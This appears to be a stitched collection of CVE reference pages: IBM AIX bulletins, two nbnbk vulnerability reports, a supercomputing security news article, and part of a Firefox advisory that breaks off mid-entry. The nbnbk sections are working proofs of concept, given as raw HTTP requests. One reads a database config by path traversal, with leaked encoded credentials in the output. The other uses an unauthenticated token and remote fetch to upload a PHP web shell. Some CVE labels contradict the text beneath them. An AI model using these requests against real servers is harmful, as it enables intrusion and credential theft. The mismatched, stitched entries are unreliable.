9b8f2f3a5a17596b2388e01fb4006a937d363f3b044b27ff817081b0d4b2c915

IJ44594s1a.221212.epkg.Z

1af43848b2d615d9a341b5b9d79a36d6ce61b3f7911808c0a07e5a14189cd33e

IJ44595s1a.221212.epkg.Z

These sums should match exactly. The OpenSSL signatures in the tar file and on this advisory can also be used to verify the integrity of the fixes. If the sums or signatures cannot be confirmed, contact IBM Support at http://ibm.com/support/ and describe the discrepancy. 

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[advisory\_file\].sig \[advisory\_file\]

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[ifix\_file\].sig \[ifix\_file\]

Published advisory OpenSSL signature file location:

http://aix.software.ibm.com/aix/efixes/security/kernel\_advisory5.asc.sig

https://aix.software.ibm.com/aix/efixes/security/kernel\_advisory5.asc.sig

ftp://aix.software.ibm.com/aix/efixes/security/kernel\_advisory5.asc.sig

**C. FIX AND INTERIM FIX INSTALLATION**

An LPAR system reboot is required to complete the iFix installation, or Live Update may be used on AIX 7.2 and 7.3 to avoid a reboot.

If possible, it is recommended that a mksysb backup of the system be created. Verify it is both bootable and readable before proceeding.

To preview a fix installation:

installp -a -d fix\_name -p all # where fix\_name is the name of the

\# fix package being previewed.

To install a fix package:

installp -a -d fix\_name -X all # where fix\_name is the name of the

\# fix package being installed.

Interim fixes have had limited functional and regression testing but not the full regression testing that takes place for Service Packs; however, IBM does fully support them.

Interim fix management documentation can be found at:

http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html

To preview an interim fix installation:

emgr -e ipkg\_name -p # where ipkg\_name is the name of the

\# interim fix package being previewed.

To install an interim fix package:

emgr -e ipkg\_name -X # where ipkg\_name is the name of the

\# interim fix package being installed.

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG10","label":"AIX"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"7.1,7.2,7.3","Edition":"","Line of Business":{"code":"LOB08","label":"Cognitive Systems"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSPHKW","label":"PowerVM Virtual I\\/O Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"3.1","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2022-43848: Security Bulletin: AIX is vulnerable to denial of service vulnerabilities

IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the rm_rlcache_file command to obtain root privileges. IBM X-Force ID: 236690.

**Security Bulletin**

  

**Summary**

A vulnerability in the AIX rm\_mlcache\_file user command could allow a non-privileged local user to obtain root privileges (CVE-2022-41290).

**Vulnerability Details**

**CVEID:**   CVE-2022-41290  
**DESCRIPTION:**   IBM AIX could allow a non-privileged local user to exploit a vulnerability in the rm\_mlcache\_file command to obtain root privileges.  
CVSS Base score: 8.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236690 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

AIX

7.1

AIX

7.2

AIX

7.3

VIOS

3.1

The vulnerabilities in the following filesets are being addressed:

Fileset

Lower Level

Upper Level

bos.rte.install

7.1.5.0

7.1.5.48

bos.rte.install

7.2.5.0

7.2.5.5

bos.rte.install

7.2.5.100

7.2.5.105

bos.rte.install

7.3.0.0

7.3.0.3

To find out whether the affected filesets are installed on your systems, refer to the lslpp command found in AIX user's guide.

Example: lslpp -L | grep -i bos.rte.install

**Remediation/Fixes**

**A. APARS**

IBM has assigned the following APARs to this problem:

AIX Level

APAR

SP

7.1.5

IJ42230

SP11

7.2.5

IJ42163

SP05

7.3.0

IJ42234

SP03

VIOS Level

APAR

SP

3.1.2

IJ42232

3.1.2.50

3.1.3

IJ42163

3.1.3.30

Subscribe to the APARs here:

https://www.ibm.com/support/pages/apar/IJ42163

https://www.ibm.com/support/pages/apar/IJ42230

https://www.ibm.com/support/pages/apar/IJ42232

https://www.ibm.com/support/pages/apar/IJ42234

By subscribing, you will receive periodic email alerting you to the status of the APAR, and a link to download the fix once it becomes available.

**B. FIXES**

IBM strongly recommends addressing the vulnerability now.

The AIX and VIOS fixes can be downloaded via ftp or http from:

ftp://aix.software.ibm.com/aix/efixes/security/rmmlcache\_fix.tar

http://aix.software.ibm.com/aix/efixes/security/rmmlcache\_fix.tar

https://aix.software.ibm.com/aix/efixes/security/rmmlcache\_fix.tar

The link above is to a tar file containing this signed advisory, fix packages, and OpenSSL signatures for each package. The fixes below include prerequisite checking. This will enforce the correct mapping between the fixes and AIX Technology Levels.

AIX Level

Interim Fix

7.1.5.8

IJ42230mAa.221208.epkg.Z

7.1.5.9

IJ42230mAa.221208.epkg.Z

7.1.5.10

IJ42230mAa.221208.epkg.Z

7.2.5.3

IJ42163m4a.221213.epkg.Z

7.2.5.4

IJ42163m4a.221213.epkg.Z

7.3.0.1

IJ42234m2a.221213.epkg.Z

7.3.0.2

IJ42234m2a.221213.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

Please reference the Affected Products and Version section above for help with checking installed fileset levels.

VIOS Level

Interim Fix

3.1.2.21

IJ42232m2a.221213.epkg.Z

3.1.2.30

IJ42232m2a.221213.epkg.Z

3.1.2.40

IJ42232m2a.221213.epkg.Z

3.1.3.10

IJ42163m4a.221213.epkg.Z

3.1.3.14

IJ42163m4a.221213.epkg.Z

3.1.3.21

IJ42163m4a.221213.epkg.Z

To extract the fixes from the tar file:

tar xvf rmmlcache\_fix.tar

cd rmmlcache\_fix

Verify you have retrieved the fixes intact:

The checksums below were generated using the "openssl dgst -sha256 \[filename\]" command as the following:

openssl dgst -sha256

filename

151660fafedd0bf43da9579f272cf01fa4435ae6d58a118d9628a91f1dbdfc49

IJ42163m4a.221213.epkg.Z

09f08f7976bb940137be2cf67362481e1b9d892b8ab02e94464fdcbd4be49e00

IJ42230mAa.221208.epkg.Z

9ae3e496e4017b98ff10327ad03778c45e0402a8024c33f257754a8f2bf0aaf8

IJ42232m2a.221213.epkg.Z

8c3a1e7a9dbb76c005158184b88fffa07b16cf3f001565578f7690fb599d9a72

IJ42234m2a.221213.epkg.Z

These sums should match exactly. The OpenSSL signatures in the tar file and on this advisory can also be used to verify the integrity of the fixes. If the sums or signatures cannot be confirmed, contact IBM Support at http://ibm.com/support/ and describe the discrepancy. 

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[advisory\_file\].sig \[advisory\_file\]

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[ifix\_file\].sig \[ifix\_file\]

Published advisory OpenSSL signature file location:

http://aix.software.ibm.com/aix/efixes/security/rmmlcache\_advisory.asc.sig

https://aix.software.ibm.com/aix/efixes/security/rmmlcache\_advisory.asc.sig

ftp://aix.software.ibm.com/aix/efixes/security/rmmlcache\_advisory.asc.sig

**C. FIX AND INTERIM FIX INSTALLATION**

If possible, it is recommended that a mksysb backup of the system be created. Verify it is both bootable and readable before proceeding.

To preview a fix installation:

installp -a -d fix\_name -p all # where fix\_name is the name of the

\# fix package being previewed.

To install a fix package:

installp -a -d fix\_name -X all # where fix\_name is the name of the

\# fix package being installed.

Interim fixes have had limited functional and regression testing but not the full regression testing that takes place for Service Packs; however, IBM does fully support them.

Interim fix management documentation can be found at:

http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html

To preview an interim fix installation:

emgr -e ipkg\_name -p # where ipkg\_name is the name of the

\# interim fix package being previewed.

To install an interim fix package:

emgr -e ipkg\_name -X # where ipkg\_name is the name of the

\# interim fix package being installed.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

14 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSPHKW","label":"PowerVM Virtual I\\/O Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"3.1","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG10","label":"AIX"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"7.1,7.2,7.3","Edition":"","Line of Business":{"code":"LOB08","label":"Cognitive Systems"}}\]

CVE-2022-41290: Security Bulletin: AIX is affected by a root privilege escalation vulnerability (CVE-2022-41290)

nbnbk commit 879858451d53261d10f77d4709aee2d01c72c301 was discovered to contain an arbitrary file read vulnerability via the component /api/Index/getFileBinary.

**nbnbk 存在任意文件读取**

Nbnbk has an arbitrary file read vulnerability

POST /api/Index/getFileBinary HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

url=../application/database.php

通过修改 url 参数来读取文件，来看返回数据。  
Return data by modifying the url parameter to read the file.

HTTP/1.1 200 OK
Date: Fri, 04 Mar 2022 03:39:37 GMT
Server: Apache/2.4.46 (Unix) mod\_fastcgi/mod\_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod\_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: \*
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 2784
Connection: close
Content-Type: text/html; charset=UTF-8

{"code":0,"msg":"操作成功","data":"PD9waHAKLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBUaGlua1BIUCBbIFdFIENBTiBETyBJVCBKVVNU\\r\\nIFRISU5LIF0KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBDb3B5cmlnaHQgKGMpIDIwMDZ+MjAxNiBo\\r\\ndHRwOi8vdGhpbmtwaHAuY24gQWxsIHJpZ2h0cyByZXNlcnZlZC4KLy8gKy0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0K\\r\\nLy8gfCBMaWNlbnNlZCAoIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy9saWNlbnNlcy9MSUNFTlNFLTIu\\r\\nMCApCi8vICstLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi8vIHwgQXV0aG9yOiBsaXUyMXN0IDxsaXUyMXN0QGdtYWls\\r\\nLmNvbT4KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCi8vIOaVsOaNruW6k+mFjee9ruaWh+S7tgoKcmV0dXJu\\r\\nIFsKICAgIC8vIOaVsOaNruW6k+exu+WeiwogICAgJ3R5cGUnICAgICAgICAgICA9PiAnbXlzcWwn\\r\\nLAogICAgLy8g5pyN5Yqh5Zmo5Zyw5Z2ACiAgICAnaG9zdG5hbWUnICAgICAgID0+ICcxMjcuMC4w\\r\\nLjEnLAogICAgLy8g5pWw5o2u5bqT5ZCNCiAgICAnZGF0YWJhc2UnICAgICAgID0+ICduYm5iaycs\\r\\nCiAgICAvLyDnlKjmiLflkI0KICAgICd1c2VybmFtZScgICAgICAgPT4gJ3Jvb3QnLAogICAgLy8g\\r\\n5a+G56CBCiAgICAncGFzc3dvcmQnICAgICAgID0+ICdwYXNzQCExMjMnLAogICAgLy8g56uv5Y+j\\r\\nCiAgICAnaG9zdHBvcnQnICAgICAgID0+ICc4ODg5JywKICAgIC8vIOi\\/nuaOpWRzbgogICAgJ2Rz\\r\\nbicgICAgICAgICAgICA9PiAnJywKICAgIC8vIOaVsOaNruW6k+i\\/nuaOpeWPguaVsAogICAgJ3Bh\\r\\ncmFtcycgICAgICAgICA9PiBbXSwKICAgIC8vIOaVsOaNruW6k+e8lueggem7mOiupOmHh+eUqHV0\\r\\nZjgKICAgICdjaGFyc2V0JyAgICAgICAgPT4gJ3V0ZjgnLAogICAgLy8g5pWw5o2u5bqT6KGo5YmN\\r\\n57yACiAgICAncHJlZml4JyAgICAgICAgID0+ICdmbF8nLAogICAgLy8g5pWw5o2u5bqT6LCD6K+V\\r\\n5qih5byPCiAgICAnZGVidWcnICAgICAgICAgID0+IGZhbHNlLAogICAgLy8g5pWw5o2u5bqT6YOo\\r\\n572y5pa55byPOjAg6ZuG5Lit5byPKOWNleS4gOacjeWKoeWZqCksMSDliIbluIPlvI8o5Li75LuO\\r\\n5pyN5Yqh5ZmoKQogICAgJ2RlcGxveScgICAgICAgICA9PiAwLAogICAgLy8g5pWw5o2u5bqT6K+7\\r\\n5YaZ5piv5ZCm5YiG56a7IOS4u+S7juW8j+acieaViAogICAgJ3J3X3NlcGFyYXRlJyAgICA9PiBm\\r\\nYWxzZSwKICAgIC8vIOivu+WGmeWIhuemu+WQjiDkuLvmnI3liqHlmajmlbDph48KICAgICdtYXN0\\r\\nZXJfbnVtJyAgICAgPT4gMSwKICAgIC8vIOaMh+WumuS7juacjeWKoeWZqOW6j+WPtwogICAgJ3Ns\\r\\nYXZlX25vJyAgICAgICA9PiAnJywKICAgIC8vIOaYr+WQpuS4peagvOajgOafpeWtl+auteaYr+WQ\\r\\npuWtmOWcqAogICAgJ2ZpZWxkc19zdHJpY3QnICA9PiB0cnVlLAogICAgLy8g5pWw5o2u6ZuG6L+U\\r\\n5Zue57G75Z6LIGFycmF5IOaVsOe7hCBjb2xsZWN0aW9uIENvbGxlY3Rpb27lr7nosaEKICAgICdy\\r\\nZXN1bHRzZXRfdHlwZScgPT4gJ2FycmF5JywKICAgIC8vIOaYr+WQpuiHquWKqOWGmeWFpeaXtumX\\r\\ntOaIs+Wtl+autQogICAgJ2F1dG9fdGltZXN0YW1wJyA9PiBmYWxzZSwKICAgIC8vIOaYr+WQpumc\\r\\ngOimgei\\/m+ihjFNRTOaAp+iDveWIhuaekAogICAgJ3NxbF9leHBsYWluJyAgICA9PiBmYWxzZSwK\\r\\nICAgIC8v5Y+W5raI5YmN5Y+w6Ieq5Yqo5qC85byP5YyWCiAgICAnZGF0ZXRpbWVfZm9ybWF0Jz0+\\r\\nIGZhbHNlLApdOwo=\\r\\n"}

文件信息在 data 字段中，是 base64 编码的格式，但其中包含了大量的 \r\n 导致我们没法直接解码。我们可以通过 js 去将所有 \r\n 删掉。

1.  打开 Google Chrome 游览器
2.  打开一个控制台
3.  输入以下代码

The file information in the data field is in the base64 encoded format, but it contains a large number of \r\n which prevents us from decoding it directly. We can delete all \r\n'through js'.

1.  Open Google Chrome Tour
2.  Open a console
3.  Enter the following code

    a = "$data string"
    a.replaceAll('\r\n', '')
    

演示将上面代码进行转化  
The demonstration transforms the above code

将转化后的数据进行 base64 转码 我使用的是 Google Chrome 插件 FeHelper  
Transcoding the converted data base64 I'm using the Google ChromePlug-inFeHelper

CVE-2022-46492: 🛡️  Nbnbk has an arbitrary file read vulnerability  · Issue #3 · Fanli2012/nbnbk

An issue discovered in Python Packaging Authority (PyPA) setuptools 65.3.0 and earlier allows remote attackers to cause a denial of service via crafted HTML package or custom PackageIndex page.

CVE-2022-40897: setuptools/package_index.py at fe8a98e696241487ba6ac9f91faa38ade939ec5d · pypa/setuptools

Vendors and operators attempt to balance power and security, but right now, power is the highest goal.

SUPERCOMPUTING 2022 — How do you keep the bad guys out of some of the world's fastest computers that store some of the most sensitive data?

That was a growing concern at last month's Supercomputing 2022 conference. Achieving the fastest system performance was a hot topic, like it is every year. But the pursuit of speed has come at the cost of securing some of these systems, which run critical workloads in science, weather modeling, economic forecasting, and national security.

Implementing security in the form of hardware or software typically involves a performance penalty, which slows down overall system performance and the output of computations. The push for more horsepower in supercomputing has made security an afterthought.

"For the most part, it's about high-performance computing. And sometimes some of these security mechanisms will reduce your performance because you are doing some checks and balances," says Jeff McVeigh, vice president and general manager of Super Compute Group at Intel.

"There's also a 'I want to make sure I'm getting the best possible performance, and if I can put in other mechanisms to control how this is being securely executed, I'll do that,'" McVeigh says.

**Security Needs Incentivizing**

Performance and data security is a constant tussle between the vendors selling the high-performance systems and the operators who are running the installation.

"Many vendors are reluctant to make these changes if the change negatively impacts the system performance," said Yang Guo, a computer scientist at the National Institutes for Standards and Technology (NIST), during a panel session at Supercomputing 2022.

The lack of enthusiasm for securing high-performance computing systems has prompted the US government to step in, with the NIST creating a working group to address the issue. Guo is leading the NIST HPC Working Group, which focuses on developing guidelines, blueprints, and safeguards for system and data security.

The HPC Working Group was created in January 2016 based on then-President Barack Obama's Executive Order 13702, which launched the National Strategic Computing Initiative. The group's activity picked up after a spate of attacks on supercomputers in Europe, some of which were involved in COVID-19 research.

**HPC Security Is Complicated**

Security in high-performance computing is not as simple as installing antivirus and scanning emails, Guo said.

High-performance computers are shared resources, with researchers booking time and connecting into systems to conduct calculations and simulations. Security requirements will vary based on HPC architectures, some of which may prioritize access control, or hardware like storage, faster CPUs, or more memory for calculations. The top focus is on securing the container and sanitizing computing nodes that pertain to projects on HPC, Guo said.

Government agencies dealing in top-secret data take a Fort Knox-style approach to secure systems by cutting off regular network or wireless access. The "air-gapped" approach helps ensure that malware does not invade the system, and that only authorized users with clearance have access to such systems.

Universities also host supercomputers, which are accessible to students and academics conducting scientific research. Administrators of these systems in many cases have limited control over security, which is managed by system vendors who want bragging rights for building the world's fastest computers.

When you place management of the systems in the hand of vendors, they will prioritize guaranteeing certain performance capabilities, said Rickey Gregg, cybersecurity program manager at the US Department of Defense's High Performance Computing Modernization Program, during the panel.

"One of the things that I was educated on many years ago was that the more money we spend on security, the less money we have for performance. We are trying to make sure that we have this balance," Gregg said.

During a question-and answer session following the panel, some system administrators expressed frustration at vendor contracts that prioritize performance in the system and deprioritize security. The system administrators said that implementing homegrown security technologies would amount to breach of contract with the vendor. That kept their system exposed.

Some panelists said that contracts could be tweaked with language in which vendors hand over security to on-site staff after a certain period of time.

**Different Approaches to Security**

The SC show floor hosted government agencies, universities, and vendors talking about supercomputing. The conversations about security were mostly behind closed doors, but the nature of supercomputing installations provided a birds-eye view of the various approaches to securing systems.

At the booth of the University of Texas at Austin's Texas Advanced Computing Center (TACC), which hosts multiple supercomputers in the Top500 list of the world's fastest supercomputers, the focus was on performance and software. TACC supercomputers get scanned regularly, and the center has tools in place to prevent invasions and two-factor authentication to authorize legit users, representatives said.

The Department of Defense has more of a "walled garden" approach, with users, workloads, and supercomputing resources segmented into a DMZ-stye border area with heavy protections and monitoring of all communications.

The Massachusetts Institute of Technology (MIT) is taking a zero-trust approach to system security by getting rid of root access. Instead it uses a command line entry called sudo to provide root privilege to HPC engineers. The sudo command provides a trail of activities HPC engineers undertake on the system, said Albert Reuther, senior staff member in the MIT Lincoln Laboratory Supercomputing Center, during the panel discussion.

"What we're really after is that auditing of who is at the keyboard, who was that person," Reuther said.

**Improving Security at the Vendor Level**

The general approach to high-performance computing has not changed in decades, with a heavy reliance on giant on-site installations with interconnected racks. That is in sharp contrast to the commercial computing market, which is moving offsite and to the cloud. Participants at the show expressed concerns about data security once it leaves on-premises systems.

AWS is trying to modernize HPC by bringing it to the cloud, which can scale up performance on demand while maintaining a higher level of security. In November, the company introduced HPC7g, a set of cloud instances for high-performance computing on Elastic Compute Cloud (EC2). EC2 employs a special controller called Nitro V5 that provides a confidential computing layer to protect data as it is stored, processed, or in transit.

"We use various hardware additions to typical platforms to manage things like security, access controls, network encapsulation, and encryption," said Lowell Wofford, AWS principal specialist solution architect for high performance computing, during the panel. He added that hardware techniques provide both the security and bare-metal performance in virtual machines.

Intel is building confidential computing features like Software Guard Extensions (SGX), a locked enclave for program execution, into its fastest server chips. According to Intel's McVeigh, a lackadaisical approach by operators is prompting the chip maker to jump ahead in securing high-performance systems.

"I remember when security wasn't important in Windows. And then they realized 'If we make this exposed and every time anyone does anything, they're going to worry about their credit card information being stolen,'" McVeigh said. "So there is a lot of effort there. I think the same things need to apply \[in HPC\]."

Security Is a Second-Class Citizen in High-Performance Computing

Default version of nbnbk was discovered to contain an arbitrary file upload vulnerability via the component /api/User/download_img.

**nbnbk 存在任意文件上传 Getshell**

Nbnbk has any file upload Getshell

**0x00 前言 Preface**

该漏洞无需账号密码即可任意文件上传 Getshell，相当于两步请求直接获取机器权限。

漏洞存在版本：default

This vulnerability allows any file to be uploaded to the Getshell without an account password, which is equivalent to two-step requests for direct access to the machine.

Vulnerability Existing Version: default

**0x01 漏洞复现 Vulnerability Reproduction****1.获取 token**

文件上传的接口需要 access\_token ，我们可以通过下面这个接口获取

Get token

The interface for file upload requires access\_ Token, we can get it from this interface

POST /api/login/wx\_login HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close

openid=1&unionid=1&sex=1&head\_img=1&nickname=1

可以在返回包中发现 token 已经生成  
You can find that token has been generated in the return package

    HTTP/1.1 200 OK
    Date: Wed, 02 Mar 2022 01:37:25 GMT
    Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
    X-Powered-By: PHP/7.4.21
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET,POST
    Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
    Content-Length: 831
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    {"code":0,"msg":"登录成功","data":{"id":10,"parent_id":0,"invite_code":"","mobile":"","email":"","nickname":"1","user_name":"u10","pay_password":0,"head_img":"1","sex":1,"birthday":"1990-01-01","money":"0.00","commission":"0.00","commission_available":"0.00","consumption_money":"0.00","frozen_money":"0.00","point":0,"user_rank":0,"user_rank_points":0,"address_id":0,"openid":"1","unionid":"1","refund_account":"","refund_name":"","signin_time":0,"group_id":50,"status":0,"add_time":1646141434,"update_time":1646141434,"delete_time":0,"login_time":1646185046,"reciever_address":null,"collect_goods_count":0,"bonus_count":0,"status_text":"正常","sex_text":"男","user_rank_text":null,"token":{"id":15,"token":"87b5fd1230df78dad5a62924426a9a6d","type":2,"user_id":10,"data":"","expire_time":1648733458,"add_time":1646141458}}}
    

**2.在 vps 中启动 http 服务**

Start HTTP service in VPS

echo '<?php phpinfo();' \> index.php
python -m http.server 8099

**3.文件上传**

File Upload

POST /api/User/download\_img HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close

access\_token=87b5fd1230df78dad5a62924426a9a6d&url=http://127.0.0.1:8099/index.php&path=info.php

这里的 access\_token 就是上面获取的 token，url 是文件地址，path 是文件名  
Access\_here Token is the token obtained above, URL is the file address, path is the file name.

返回 200 表示成功，我们直接访问 http://nbnbk:8888/info.php 可以看到已经写入文件并能成功解析。

Back to 200 means success, we visit directly http://nbnbk:8888/info.php You can see that the file has been written and parsed successfully.

**0x02 漏洞分析**

Vulnerability Analysis

**1.发现危险函数**

Discover danger function

通过全局搜索 fopen 这个打开文件的函数，发现了 api 下面存在一个 path 用变量来控制，极有肯能存在问题。  
By searching fopen, an open file function globally, we found that there is a path under the API that is controlled by variables, which is probably problematic.

双击后可以发现是一个 download\_img 的函数，其中 url 和 path 变量是可控的。  
Double-click to find a download\_ Function of img where url and path variables are controllable.

这里直接使用 curl 访问了我们提供的 url 并且 path 也没有做任何过滤。直接读文件写到指定目录。  
Curl is used directly here to access the url'we provided and path\` does not filter at all. Read the file directly to the specified directory.

直接构造路近请求但是提示 token 错误，下一步我们需要获得 token。  
Construct the approach request directly but prompt token error, we need to get token next.

**2.获取token**

Get token

看源码可以知道，一定是要登陆才能调用到 getToken 。可以通过注册登陆的方式来获取，但是如果关闭了注册功能、注册功能失效，我们就没法获取 token 了。有没有不需要有账号密码即可获取 token 的方式？

我们继续来看登陆功能的 Login.php 发现提供了一种不需要账号密码就可以登陆的方式。

Looking at the source code, you know that you must be logged in to call getToken'. It can be obtained by registering for login, but if the registration function is turned off and the registration function is invalid, we will not be able to get token'. Is there a way to get \`token'without an account password?

Let's move on to Login'for login functionality. PhpDiscovery provides a way to log in without an account password.

进一步跟进 wxLogin 函数  
Follow Up wxLogin Function

1.  折叠函数里包含了输入内容的校验，大概意思是用户不存在可以创建一个新的，这里我们可以不用管。
2.  通过了校验之后会生成新的 token

1.The collapse function contains a check of the input content, which probably means that the user does not exist and can create a new one, which we can ignore here.

2.New \`token'will be generated after passing the check

我们直接构造数据包，填入需要的字段即可直接拿到生成的 token。到这里分析就结束了。

We construct the data package directly and fill in the required fields to get the generated token. The analysis is over here.

CVE-2022-46493: 🛡️  Nbnbk has any file upload Getshell · Issue #1 · Fanli2012/nbnbk

When downloading an HTML file, if the title of the page was formatted as a filename with a malicious extension, Firefox may have saved the file with that extension, leading to possible system compromise if the downloaded file was later ran. This vulnerability affects Firefox < 107.

**Mozilla Foundation Security Advisory 2022-47**

Announced

November 15, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 107

This advisory was updated December 13, 2022 to add CVE-2022-46882 and CVE-2022-46883. Both fixes were included in the original release of Firefox 107, but did not appear in the advisory published at that time.

**#CVE-2022-45403: Service Workers might have learned size of cross-origin media files**

Reporter

Anne van Kesteren and Karl Tomlinson

Impact

high

**Description**

Service Workers should not be able to infer information about opaque cross-origin responses; but timing information for cross-origin media combined with Range requests might have allowed them to determine the presence or length of a media file.

**References**

*   Bug 1762078

**#CVE-2022-45404: Fullscreen notification bypass**

Reporter

Irvan Kurniawan

Impact

high

**Description**

Through a series of popup and window.print() calls, an attacker can cause a window to go fullscreen without the user seeing the notification prompt, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1790815

**#CVE-2022-45405: Use-after-free in InputStream implementation**

Reporter

Atte Kettunen

Impact

high

**Description**

Freeing arbitrary nsIInputStream's on a different thread than creation could have led to a use-after-free and potentially exploitable crash.

**References**

*   Bug 1791314

**#CVE-2022-45406: Use-after-free of a JavaScript Realm**

Reporter

Samuel Groß

Impact

high

**Description**

If an out-of-memory condition occurred when creating a JavaScript global, a JavaScript realm may be deleted while references to it lived on in a BaseShape. This could lead to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1791975

**#CVE-2022-45407: Loading fonts on workers was not thread-safe**

Reporter

Armin Ebert

Impact

high

**Description**

If an attacker loaded a font using FontFace() on a background worker, a use-after-free could have occurred, leading to a potentially exploitable crash.

**References**

*   Bug 1793314

**#CVE-2022-45408: Fullscreen notification bypass via windowName**

Reporter

Irvan Kurniawan

Impact

high

**Description**

Through a series of popups that reuse windowName, an attacker can cause a window to go fullscreen without the user seeing the notification prompt, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1793829

**#CVE-2022-45409: Use-after-free in Garbage Collection**

Reporter

Gary Kwong

Impact

high

**Description**

The garbage collector could have been aborted in several states and zones and GCRuntime::finishCollection may not have been called, leading to a use-after-free and potentially exploitable crash

**References**

*   Bug 1796901

**#CVE-2022-45410: ServiceWorker-intercepted requests bypassed SameSite cookie policy**

Reporter

Dongsung Kim

Impact

moderate

**Description**

When a ServiceWorker intercepted a request with FetchEvent, the origin of the request was lost after the ServiceWorker took ownership of it. This had the effect of negating SameSite cookie protections. This was addressed in the spec and then in browsers.

**References**

*   Bug 1658869

**#CVE-2022-45411: Cross-Site Tracing was possible via non-standard override headers**

Reporter

scarlet

Impact

moderate

**Description**

